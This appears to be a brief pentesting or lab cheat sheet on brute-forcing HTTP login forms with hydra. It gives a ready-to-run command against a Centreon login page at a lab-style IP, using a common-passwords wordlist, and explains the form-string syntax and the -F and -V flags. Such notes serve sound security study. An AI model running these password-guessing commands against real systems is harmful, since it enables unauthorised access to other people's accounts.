Skip to content

HTTP-Auth-Forms

hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/500-worst-passwords.txt 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect:Your credentials are incorrect" -FV

  • Get the http-post-form stuff from dev tools, burp, or zap
  • :S=logout is what to look for on the page if your login succeeds. You can also do just "...:login failed", if your form returns you to a page with the message login failed on it.
  • -V is verboose, and -F is stop when a good password is found

hydra -U http-form-post For other examples!